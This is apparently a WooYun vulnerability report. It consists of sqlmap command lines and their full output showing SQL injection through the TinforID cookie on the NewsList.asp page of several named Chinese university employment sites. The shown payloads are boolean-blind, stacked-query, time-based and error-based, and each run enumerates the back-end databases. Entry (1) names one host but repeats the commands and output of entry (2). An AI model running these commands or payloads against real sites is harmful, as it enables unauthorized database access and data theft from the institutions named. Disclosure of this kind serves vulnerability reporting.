WooYun.org

（1）http://job.sicfl.edu.cn/
$ py sqlmap.py -u http://jy.shutcm.edu.cn/NewsList.asp --cookie="TinforID=1111" --level 5 --risk 3 --dbs -v 1
---
Place: Cookie
Parameter: TinforID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: TinforID=154' AND 2655=2655 AND 'EGSS'='EGSS
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: TinforID=154'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: TinforID=154' WAITFOR DELAY '0:0:5'--
---
[14:23:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[14:23:13] [INFO] fetching database names
[14:23:13] [INFO] fetching number of databases
[14:23:13] [INFO] resumed: 7
[14:23:13] [INFO] resumed: AadmissionsOffice
[14:23:13] [INFO] resumed: Graduate&Management
[14:23:13] [INFO] resumed: IJCenterOfCareer
[14:23:13] [INFO] resumed: master
[14:23:13] [INFO] resumed: model
[14:23:13] [INFO] resumed: msdb
[14:23:13] [INFO] resumed: tempdb
available databases [7]:
[*] [Graduate&Management]
[*] AadmissionsOffice
[*] IJCenterOfCareer
[*] master
[*] model
[*] msdb
[*] tempdb

(2) http://jy.shutcm.edu.cn/NewsList.asp
$ py sqlmap.py -u http://jy.shutcm.edu.cn/NewsList.asp --cookie="TinforID=1111" --level 5 --risk 3 --dbs -v 1
---
Place: Cookie
Parameter: TinforID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: TinforID=154' AND 2655=2655 AND 'EGSS'='EGSS
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: TinforID=154'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: TinforID=154' WAITFOR DELAY '0:0:5'--
---
[14:35:18] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[14:35:18] [INFO] fetching database names
[14:35:18] [INFO] fetching number of databases
[14:35:18] [INFO] resumed: 7
[14:35:18] [INFO] resumed: AadmissionsOffice
[14:35:18] [INFO] resumed: Graduate&Management
[14:35:18] [INFO] resumed: IJCenterOfCareer
[14:35:18] [INFO] resumed: master
[14:35:18] [INFO] resumed: model
[14:35:18] [INFO] resumed: msdb
[14:35:18] [INFO] resumed: tempdb
available databases [7]:
[*] [Graduate&Management]
[*] AadmissionsOffice
[*] IJCenterOfCareer
[*] master
[*] model
[*] msdb
[*] tempdb

(3) http://job.smic.edu.cn/NewsList.asp
$ py sqlmap.py -u http://job.smic.edu.cn/NewsList.asp --cookie="TinforID=1111" --level 5 --risk 3 --dbs -v 1
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end u
[*] starting at 15:12:08
[15:12:08] [INFO] resuming back-end DBMS 'microsoft sql server'
[15:12:08] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: Cookie
Parameter: TinforID
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: TinforID=-2964' OR (1859=1859) AND 'BIWo'='BIWo
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: TinforID=-7641' OR 4526=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(120)+CHAR(114)+CHAR(113)+(SELECT (
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: TinforID=1111'; WAITFOR DELAY '0:0:5'--
---
[15:12:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[15:12:09] [INFO] fetching database names
[15:12:09] [INFO] the SQL query used returns 10 entries
[15:12:09] [INFO] resumed: Graduate&Management
[15:12:09] [INFO] resumed: IJCenterOfCareer
[15:12:09] [INFO] resumed: master
[15:12:09] [INFO] resumed: model
[15:12:09] [INFO] resumed: msdb
[15:12:09] [INFO] resumed: Northwind
[15:12:09] [INFO] resumed: pubs
[15:12:09] [INFO] resumed: tempdb
[15:12:09] [INFO] resumed: xuegong
[15:12:09] [INFO] resumed: xuegongtest
available databases [10]:
[*] Graduate&Management
[*] IJCenterOfCareer
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] xuegong
[*] xuegongtest

(4) http://jyxx.shumc.edu.cn
$ py sqlmap.py -u http://jyxx.shumc.edu.cn/NewsList.asp --cookie="TinforID=1111" --level 5 --risk 3 --dbs -v 0
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end
[*] starting at 15:23:54
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: Cookie
Parameter: TinforID
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: TinforID=-6512' OR (3928=3928) AND 'ouRE'='ouRE
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: TinforID=-5592' OR 8926=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(109)+CHAR(109)+CHAR(113)+(SELECT
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: TinforID=1111'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: TinforID=-8878' OR 7647=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysu
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[15:23:54] [INFO] resumed: Graduate&Management
[15:23:54] [INFO] resumed: IJCenterOfCareer
[15:23:54] [INFO] resumed: master
[15:23:54] [INFO] resumed: model
[15:23:54] [INFO] resumed: msdb
[15:23:54] [INFO] resumed: ReportServer$sql2005
[15:23:54] [INFO] resumed: ReportServer$sql2005TempDB
[15:23:54] [INFO] resumed: tempdb
[15:23:54] [INFO] resumed: Trans
[15:23:54] [INFO] resumed: Trans2
[15:23:54] [INFO] resumed: yuanl
available databases [11]:
[*] Graduate&Management
[*] IJCenterOfCareer
[*] master
[*] model
[*] msdb
[*] ReportServer$sql2005
[*] ReportServer$sql2005TempDB
[*] tempdb
[*] Trans
[*] Trans2
[*] yuanl

(5) http://jy.sthu.edu.cn/
$ py sqlmap.py -u http://jy.sthu.edu.cn/NewsList.asp --cookie="TinforID=1111" --level 5 --risk 3 --dbs -v 1
---
Place: Cookie
Parameter: TinforID
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: TinforID=-1870' OR (6515=6515) AND 'whCL'='whCL
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: TinforID=-5376' OR 9872=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(104)+CHAR(110)+CHAR(113)+(SELECT
---
[21:47:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2005
[21:47:43] [INFO] fetching database names
[21:47:43] [INFO] the SQL query used returns 6 entries
[21:47:43] [INFO] resumed: Graduate&Management
[21:47:43] [INFO] resumed: IJCenterOfCareer
[21:47:43] [INFO] resumed: master
[21:47:43] [INFO] resumed: model
[21:47:43] [INFO] resumed: msdb
[21:47:43] [INFO] resumed: tempdb
available databases [6]:
[*] Graduate&Management
[*] IJCenterOfCareer
[*] master
[*] model
[*] msdb
[*] tempdb